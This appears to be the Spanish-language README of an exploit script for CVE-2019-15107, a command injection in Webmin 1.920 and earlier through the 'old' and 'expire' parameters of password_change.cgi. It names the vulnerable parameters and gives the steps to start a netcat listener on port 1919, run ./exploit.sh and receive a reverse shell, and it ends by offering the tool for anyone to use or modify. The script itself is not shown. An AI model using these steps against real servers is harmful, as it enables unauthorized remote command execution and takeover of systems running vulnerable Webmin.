
webmin <=1.920 - RCE mediante vulnerabilidad de inyección de comandos
https://www.cvedetails.com/cve/CVE-2019-15107/
Se descubrió un problema en Webmin <=1.920. Los parámetros "old" y "expire" en password_change.cgi contienen una vulnerabilidad de inyección de comandos.
rlwrap -cAr nc -lvp 1919
./exploit.sh
Deja que se ejecute, se recibe una reverse shell en el listener.

Siéntete libre de usar o modificar cuando y donde quieras